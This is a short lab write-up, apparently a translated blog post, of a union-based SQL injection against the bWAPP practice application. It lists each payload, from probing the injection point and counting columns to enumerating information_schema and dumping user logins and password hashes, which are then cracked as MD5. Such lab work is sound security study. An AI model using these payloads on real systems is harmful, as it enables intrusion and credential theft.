当前位置:网站首页>SQL Injection (GET/Search)
SQL Injection (GET/Search)
2022-07-03 13:37:00 【this is hhhhp】
1. Determine the injection point
Input ' Tips : near '%'' at line 1
1111' or 1=1 #
No abnormality
2. Determine the number of fields
' order by 10 #
' order by 7 #
7 A field
3. Determine the displayable fields :
-1' union select 1,2,3,4,5,6,7 #
2,3,4,5 Is a displayable field
4. Blast storage :
-1' union select 1,database(),3,4,5,6,7 #
Library name :bWAPP
5. Explosion meter :
-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
altogether 5 A watch , Obviously we need to use users
6. Pop field name
-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#
altogether 9 A field , We need to login,admin,password
7. Pop field content
-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#
Two in all
8.md5 Decrypt md5 Online decryption ,md5 Decryption encryption
A.I.M. bug
bee bug
边栏推荐
- Sequence table (implemented in C language)
- 双链笔记 RemNote 综合评测:快速输入、PDF 阅读、间隔重复/记忆
- Flutter dynamic | fair 2.5.0 new version features
- 今日睡眠质量记录77分
- Box layout of Kivy tutorial BoxLayout arranges sub items in vertical or horizontal boxes (tutorial includes source code)
- stm32和电机开发(从mcu到架构设计)
- Kivy教程之 如何自动载入kv文件
- 软件测试工作那么难找,只有外包offer,我该去么?
- untiy世界边缘的物体阴影闪动,靠近远点的物体阴影正常
- Ubuntu 14.04 下开启PHP错误提示
猜你喜欢
Flink SQL knows why (12): is it difficult to join streams? (top)
The difference between stratifiedkfold (classification) and kfold (regression)
Box layout of Kivy tutorial BoxLayout arranges sub items in vertical or horizontal boxes (tutorial includes source code)
Libuv Library - Design Overview (Chinese version)
【历史上的今天】7 月 3 日:人体工程学标准法案;消费电子领域先驱诞生;育碧发布 Uplay
(first) the most complete way to become God of Flink SQL in history (full text 180000 words, 138 cases, 42 pictures)
Flink SQL knows why (16): dlink, a powerful tool for developing enterprises with Flink SQL
Annotation and reflection
[email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g"/>
Start signing up CCF C ³- [email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g
File uploading and email sending
随机推荐
Comprehensive evaluation of double chain notes remnote: fast input, PDF reading, interval repetition / memory
18W word Flink SQL God Road manual, born in the sky
Flink SQL knows why (16): dlink, a powerful tool for developing enterprises with Flink SQL
R语言使用data函数获取当前R环境可用的示例数据集:获取datasets包中的所有示例数据集、获取所有包的数据集、获取特定包的数据集
(first) the most complete way to become God of Flink SQL in history (full text 180000 words, 138 cases, 42 pictures)
PowerPoint 教程,如何在 PowerPoint 中将演示文稿另存为视频?
全面发展数字经济主航道 和数集团积极推动UTONMOS数藏市场
Universal dividend source code, supports the dividend of any B on the BSC
Typeerror resolved: argument 'parser' has incorrect type (expected lxml.etree.\u baseparser, got type)
Red hat satellite 6: better management of servers and clouds
The reasons why there are so many programming languages in programming internal skills
Comprehensive evaluation of double chain notes remnote: fast input, PDF reading, interval repetition / memory
【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
[quantitative trading] permanent portfolio, turtle trading rules reading, back testing and discussion
Introduction to the implementation principle of rxjs observable filter operator
【历史上的今天】7 月 3 日:人体工程学标准法案;消费电子领域先驱诞生;育碧发布 Uplay
Logseq evaluation: advantages, disadvantages, evaluation, learning tutorial
JS 将伪数组转换成数组
Today's sleep quality record 77 points
使用Tensorflow进行完整的深度神经网络CNN训练完成图片识别案例2